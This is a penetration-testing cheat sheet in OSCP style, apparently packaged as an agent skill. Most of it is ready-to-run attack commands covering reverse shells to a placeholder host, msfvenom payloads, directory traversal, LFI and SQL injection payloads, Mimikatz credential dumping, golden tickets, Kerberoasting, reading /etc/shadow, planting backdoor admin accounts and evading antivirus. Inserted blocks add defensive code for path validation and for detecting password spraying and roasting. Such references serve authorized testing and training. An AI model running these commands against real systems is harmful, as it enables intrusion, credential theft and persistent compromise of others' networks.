OSCP Penetration Testing Methodology
Purpose
Execute comprehensive penetration testing engagements following OSCP methodology, covering reconnaissance, enumeration, exploitation, privilege escalation, and post-exploitation phases across Windows, Linux, and Active Directory environments. This skill provides actionable commands and techniques for each phase of a professional penetration test.
Inputs / Prerequisites
Required Tools
- Kali Linux or equivalent attack platform
- Nmap, Gobuster, Nikto for enumeration
- Metasploit Framework, Impacket suite
- Mimikatz, BloodHound, PowerView for AD attacks
- Hashcat, John the Ripper for password cracking
Environment Requirements
- Network access to target systems
- Proper authorization documentation
- Note-taking application for findings
- File transfer capabilities established
Outputs / Deliverables
Primary Outputs
- Complete enumeration findings
- Exploited system access documentation
- Privilege escalation paths identified
- Lateral movement successful demonstrations
Core Workflow
Phase 1: Port Scanning and Enumeration
Initial Scanning
Basic scan with version detection
nmap -sC -sV <IP> -v
Complete scan all ports
nmap -T4 -A -p- <IP> -v
Vulnerability scanning
sudo nmap -sV -p 443 --script "vuln" <IP>
PowerShell port scan
1..1024 | % {echo ((New-Object Net.Sockets.TcpClient).Connect("<IP>", $_)) "TCP port $_ is open"}
Phase 2: Service Enumeration
FTP Enumeration (Port 21)
Connect and test anonymous access
ftp <IP>
Try: anonymous / anonymous
Nmap scripts
nmap -p21 --script=ftp-anon,ftp-bounce <IP>
Brute force
hydra -L users.txt -P passwords.txt <IP> ftp
SSH Enumeration (Port 22)
Connect with password
ssh user@<IP>
Connect with key
chmod 600 id_rsa
ssh user@<IP> -i id_rsa
Crack encrypted key
ssh2john id_rsa > hash
john --wordlist=rockyou.txt hash
Brute force
hydra -l user -P passwords.txt <IP> ssh
SMB Enumeration (Port 445)
NetBIOS scan
sudo nbtscan -r 192.168.50.0/24
CrackMapExec enumeration
crackmapexec smb <IP> -u user -p pass --shares
crackmapexec smb <IP> -u user -p pass --users
crackmapexec smb <IP> -u user -p pass --all
SMBclient
smbclient -L //<IP>
smbclient //<IP>/share -U user
Download all files from share
smbclient //<IP>/share -U user
At the smb: \> prompt:
mask ""
recurse ON
prompt OFF
mget *
HTTP/HTTPS Enumeration
Directory discovery
gobuster dir -u http://<IP> -w /usr/share/wordlists/dirb/big.txt
dirsearch -u http://<IP> -w wordlist.txt
Vulnerability scanning
nikto -h <url>
WordPress
wpscan --url "target" --enumerate vp,u,vt,tt
Drupal
droopescan scan drupal -u http://site
API fuzzing
gobuster dir -u http://<IP>:5002 -w big.txt -p pattern
curl -i http://<IP>:5002/users/v1
LDAP Enumeration (Port 389)
Anonymous bind
ldapsearch -x -H ldap://<IP> -D '' -w '' -b "DC=domain,DC=com"
Authenticated
ldapsearch -x -H ldap://<IP> -D 'DOMAIN\user' -w 'pass' -b "CN=Users,DC=domain,DC=com"
windapsearch
python3 windapsearch.py --dc-ip <IP> -u user -p pass --users
python3 windapsearch.py --dc-ip <IP> -u user -p pass --da
SNMP Enumeration (Port 161)
snmpcheck -t <IP> -c public
snmpwalk -c public -v1 -t 10 <IP>
Phase 3: Web Attacks
Directory Traversal
Linux
http://target/page.php?file=../../../../../etc/passwd
Windows
http://target/page.php?file=../../../../../Windows/System32/drivers/etc/hosts
URL encoded
curl http://<IP>/cgi-bin/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
Local File Inclusion (LFI)
Log poisoning
http://<IP>/index.php?page=../../../../../var/log/apache2/access.log
Inject PHP in User-Agent, then trigger via log
PHP wrappers
curl "http://<IP>/index.php?page=php://filter/convert.base64-encode/resource=config.php"
curl "http://<IP>/index.php?page=data://text/plain,<?php%20system('id');?>"
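For the defensive side of the traversal and LFI payloads above, the following is an added example (not code from the original cheat sheet) of the server-side check that defeats them: decode, reject stream wrappers, canonicalise, and confirm the result stays under the web root. The web root path, the include handler and its allowed extensions are assumptions.

```python
from pathlib import Path
from typing import Optional
from urllib.parse import unquote

# Assumed web root for a hypothetical ?page= include handler (not from the page).
WEB_ROOT = Path("/srv/app/pages").resolve()
ALLOWED_SUFFIXES = {".php", ".html"}

def resolve_include(param: str) -> Optional[Path]:
    """Map a ?page= parameter to a file under WEB_ROOT, or None if it is unsafe."""
    # Decode repeatedly so %2e%2e and double-encoded variants are seen as '..'
    decoded = param
    for _ in range(3):
        once = unquote(decoded)
        if once == decoded:
            break
        decoded = once
    # php://filter, data:, expect:// and friends all carry a scheme; a legitimate
    # page name never contains ':', so any colon means a wrapper, not a file
    if ":" in decoded:
        return None
    # Null bytes truncate paths in older PHP; treat them as hostile
    if "\x00" in decoded:
        return None
    # Normalise Windows separators so ..\..\ is checked the same way as ../../
    decoded = decoded.replace("\\", "/")
    candidate = (WEB_ROOT / decoded.lstrip("/")).resolve()
    # The canonical path must remain under the web root; this defeats ../ chains
    # no matter how many levels are stacked
    try:
        candidate.relative_to(WEB_ROOT)
    except ValueError:
        return None
    # Whitelisting extensions also blocks log files and OS files under the root
    if candidate.suffix not in ALLOWED_SUFFIXES:
        return None
    return candidate
```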
SQL Injection
-- Authentication bypass
admin' or '1'='1
' or '1'='1'--
" or "1"="1"--
-- Time-based detection
' AND IF (1=1, sleep(3),'false') --
SQLMap Exploitation
Test parameter
sqlmap -u http://<IP>/page.php?id=1 -p id
Dump database
sqlmap -u http://<IP>/page.php?id=1 -p id --dump
OS shell
sqlmap -r request.txt -p item --os-shell --web-root "/var/www/html"
Phase 4: Exploitation
Reverse Shell Payloads
Windows executables
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell.exe
Linux
bash -i >& /dev/tcp/<IP>/<PORT> 0>&1
Python
python -c 'import socket,os,pty;s=socket.socket();s.connect(("<IP>",<PORT>));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/bash")'
PHP
<?php echo shell_exec('bash -i >& /dev/tcp/<IP>/<PORT> 0>&1');?>
File Transfers
Windows download
powershell -c Invoke-WebRequest -Uri http://<IP>/file -OutFile C:\temp\file
certutil -urlcache -split -f "http://<IP>/file" file
Linux download
wget http://<IP>/file
curl http://<IP>/file -o output
SMB transfer (Kali to Windows)
impacket-smbserver -smb2support share .
Windows: copy \\<IP>\share\file .
Phase 5: Windows Privilege Escalation
Automated Enumeration
Run winPEAS
.\winpeas.exe
PowerUp
Import-Module .\PowerUp.ps1
Invoke-AllChecks
Token Impersonation
PrintSpoofer
PrintSpoofer.exe -i -c powershell.exe
GodPotato
GodPotato.exe -cmd "shell.exe"
JuicyPotatoNG
JuicyPotatoNG.exe -t * -p "shell.exe" -a
Service Exploitation
Unquoted service path
wmic service get name,pathname | findstr /i /v "C:\Windows\" | findstr /i /v """
Check permissions
icacls "C:\path\to\service"
Modify and restart
sc config <service> binpath="C:\path\to\shell.exe"
sc start <service>
AlwaysInstallElevated
Check
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
Exploit
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f msi > shell.msi
msiexec /quiet /qn /i shell.msi
Credential Hunting
PowerShell history
type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
Search for passwords
findstr /si password *.xml *.ini *.txt *.config
Registry
reg query HKLM /f password /t REG_SZ /s
Saved credentials
cmdkey /list
runas /savecred /user:admin C:\shell.exe
Phase 6: Linux Privilege Escalation
TTY Shell Upgrade
python3 -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm
Ctrl+Z, then:
stty raw -echo; fg
Enumeration
LinPEAS
./linpeas.sh
Sudo
sudo -l
SUID
find / -perm -u=s -type f 2>/dev/null
Capabilities
getcap -r / 2>/dev/null
Cron jobs
cat /etc/crontab
Sensitive Files
SSH keys
cat ~/.ssh/id_rsa
cat /root/.ssh/id_rsa
Password files
cat /etc/passwd
cat /etc/shadow
Phase 7: Active Directory Attacks
Enumeration with PowerView
Import-Module .\PowerView.ps1
Get-NetDomain
Get-NetUser | select samaccountname
Get-NetGroup
Get-NetComputer
Find-LocalAdminAccess
Get-NetUser -SPN | select samaccountname,serviceprincipalname
BloodHound Collection
SharpHound
Import-Module .\Sharphound.ps1
Invoke-BloodHound -CollectionMethod All -OutputDirectory C:\temp
bloodhound-python
bloodhound-python -u 'user' -p 'pass' -ns <DC-IP> -d domain.com -c all
Password Spraying
CrackMapExec
crackmapexec smb <IP> -u users.txt -p 'Password123' -d domain --continue-on-success
Kerbrute
kerbrute passwordspray -d domain.com users.txt "Password123"
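From the blue-team side, the spraying commands above leave a distinctive trail on the domain controllers: one source failing logons against many different accounts in a short time. The following is an added example (not part of the original cheat sheet) of that detection over constructed Security-log records; the field names follow the Windows events, the sample data and thresholds are invented.

```python
from collections import defaultdict
from datetime import datetime, timedelta

def ev(time, event_id, user, ip):
    """Build a minimal, constructed Security-log record using the event's field names."""
    return {"time": time, "EventID": event_id, "TargetUserName": user, "IpAddress": ip}

# Constructed sample: 10.0.0.7 tries one password against six accounts within two
# minutes (the spray); 10.0.0.22 is a single user mistyping their own password.
EVENTS = [
    ev("2024-05-01T09:00:01", 4625, "alice", "10.0.0.7"),
    ev("2024-05-01T09:00:12", 4625, "bob", "10.0.0.7"),
    ev("2024-05-01T09:00:25", 4771, "carol", "10.0.0.7"),
    ev("2024-05-01T09:00:40", 4625, "dave", "10.0.0.7"),
    ev("2024-05-01T09:01:03", 4771, "erin", "10.0.0.7"),
    ev("2024-05-01T09:01:30", 4625, "frank", "10.0.0.7"),
    ev("2024-05-01T09:02:00", 4625, "grace", "10.0.0.22"),
    ev("2024-05-01T09:02:09", 4625, "grace", "10.0.0.22"),
    ev("2024-05-01T09:02:20", 4625, "grace", "10.0.0.22"),
]

def detect_spray(events, min_accounts=5, window=timedelta(minutes=10)):
    """Return {source_ip: [accounts]} for sources that failed logons against at
    least min_accounts distinct accounts inside one sliding window.
    4625 covers SMB/NTLM sprays (the crackmapexec form); Kerberos sprays (the
    kerbrute form) show up on the DC as 4771 pre-authentication failures, so
    both event IDs are read."""
    by_src = defaultdict(list)
    for e in events:
        if e["EventID"] not in (4625, 4771):
            continue
        by_src[e["IpAddress"]].append((datetime.fromisoformat(e["time"]), e["TargetUserName"]))
    hits = {}
    for src, attempts in by_src.items():
        attempts.sort()
        for i, (start, _) in enumerate(attempts):
            accounts = {u for t, u in attempts[i:] if t - start <= window}
            if len(accounts) >= min_accounts:
                hits[src] = sorted(accounts)
                break
    return hits

if __name__ == "__main__":
    print(detect_spray(EVENTS))
```

A lockout-safe spray (one password per observation window) still trips this rule, because it keys on distinct target accounts per source rather than on failure count per account.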
AS-REP Roasting
Impacket
impacket-GetNPUsers -dc-ip <DC-IP> domain/user:pass -request
Crack hash
hashcat -m 18200 hash.txt rockyou.txt --force
Kerberoasting
Rubeus
.\Rubeus.exe kerberoast /outfile:hashes.txt
Impacket
impacket-GetUserSPNs -dc-ip <DC-IP> domain/user:pass -request
Crack
hashcat -m 13100 hashes.txt rockyou.txt --force
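Both roasting techniques above are visible in domain controller telemetry: Kerberoasting as a burst of RC4 (0x17) service-ticket requests (Event 4769) from one account, AS-REP roasting as TGTs issued without pre-authentication (Event 4768, PreAuthType 0). The following is an added example (not code from the original cheat sheet) of those two checks over constructed events; the account names, IPs and the min_spns threshold are invented.

```python
from collections import defaultdict

def tgs(user, service, enc, ip):
    """Constructed Event 4769 (service ticket requested) using the event's field names."""
    return {"EventID": 4769, "TargetUserName": user, "ServiceName": service,
            "TicketEncryptionType": enc, "IpAddress": ip}

def tgt(user, preauth, enc):
    """Constructed Event 4768 (TGT requested)."""
    return {"EventID": 4768, "TargetUserName": user, "PreAuthType": preauth,
            "TicketEncryptionType": enc}

# Constructed sample: j.doe pulls RC4 tickets for three service accounts in a row
# (the Kerberoast pattern); alice's AES ticket for a workstation is normal traffic;
# svc_legacy has pre-authentication disabled, which is what AS-REP roasting needs.
EVENTS = [
    tgs("j.doe", "svc_sql", "0x17", "10.0.0.7"),
    tgs("j.doe", "svc_web", "0x17", "10.0.0.7"),
    tgs("j.doe", "svc_backup", "0x17", "10.0.0.7"),
    tgs("j.doe", "krbtgt", "0x17", "10.0.0.7"),
    tgs("alice", "WS01$", "0x12", "10.0.0.31"),
    tgt("svc_legacy", "0", "0x17"),
    tgt("alice", "2", "0x12"),
]

def kerberoast_suspects(events, min_spns=3):
    """Requesting accounts that obtained RC4 (0x17) service tickets for at least
    min_spns distinct user-account SPNs. krbtgt and computer accounts (names
    ending in $) are excluded: they are not the crackable targets in this
    pattern and would only add noise."""
    spns = defaultdict(set)
    for e in events:
        if e["EventID"] != 4769 or e["TicketEncryptionType"] != "0x17":
            continue
        svc = e["ServiceName"]
        if svc.lower() == "krbtgt" or svc.endswith("$"):
            continue
        spns[e["TargetUserName"]].add(svc)
    return {u: sorted(s) for u, s in spns.items() if len(s) >= min_spns}

def asrep_suspects(events):
    """Accounts issued a TGT without pre-authentication (PreAuthType 0), the
    condition AS-REP roasting depends on. Each is a candidate for re-enabling
    pre-authentication rather than an incident on its own."""
    return sorted({e["TargetUserName"] for e in events
                   if e["EventID"] == 4768 and e["PreAuthType"] == "0"})
```

Moving service accounts to AES-only (so 4769 stops showing 0x17) and to long random passwords removes most of what the hashcat modes 13100 and 18200 above can crack.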
Lateral Movement
psexec
psexec.py domain/user:pass@<IP>
psexec.py -hashes :NTLM_HASH domain/user@<IP>
smbexec
smbexec.py domain/user:pass@<IP>
wmiexec
wmiexec.py domain/user:pass@<IP>
winrs (Windows)
winrs -r:<computer> -u:user -p:pass "cmd"
Mimikatz
privilege::debug
sekurlsa::logonpasswords
lsadump::sam
lsadump::lsa /patch
Golden Ticket
Dump krbtgt hash
lsadump::lsa /inject /name:krbtgt
Create ticket
kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-... /krbtgt:<HASH> /ptt
Phase 8: Password Cracking
Hashcat
Identify hash type: https://hashcat.net/wiki/doku.php?id=example_hashes
hashcat -m <mode> hash.txt rockyou.txt --force
Common modes
0 = MD5
100 = SHA1
1000 = NTLM
1800 = sha512crypt
13100 = Kerberoast
18200 = AS-REP
John the Ripper
Convert formats
ssh2john id_rsa > hash
keepass2john Database.kdbx > hash
Crack
john --wordlist=rockyou.txt hash
Quick Reference
Important Windows Locations
C:\Windows\repair\SAM
C:\Windows\System32\config\SAM
C:\Windows\Panther\Unattend.xml
C:\inetpub\wwwroot\web.config
%userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
Important Linux Locations
/etc/passwd
/etc/shadow
/etc/crontab
/etc/exports
~/.ssh/id_rsa
~/.bash_history
/var/www/html/
Adding Users
Windows
net user hacker Password123 /add
net localgroup Administrators hacker /add
Linux
useradd -u 0 -g 0 -o -d /root hacker
Constraints and Guardrails
Operational Boundaries
- Operate only within authorized scope
- Document all findings and actions
- Avoid denial of service conditions
- Report critical findings immediately
Technical Limitations
- Some exploits require specific conditions
- AV/EDR may block common tools
- Network segmentation limits lateral movement
- Modern systems have enhanced protections
Troubleshooting
Shell Not Connecting
- Check firewall rules on both ends
- Try alternate ports (443, 80)
- Use encoded payloads to bypass AV
Exploit Not Working
- Verify exact version matches
- Check architecture (x86 vs x64)
- Test in isolated environment first
No Privilege Escalation Path
- Run multiple enumeration scripts
- Check manual techniques
- Look for credential reuse
- Consider kernel exploits as last resort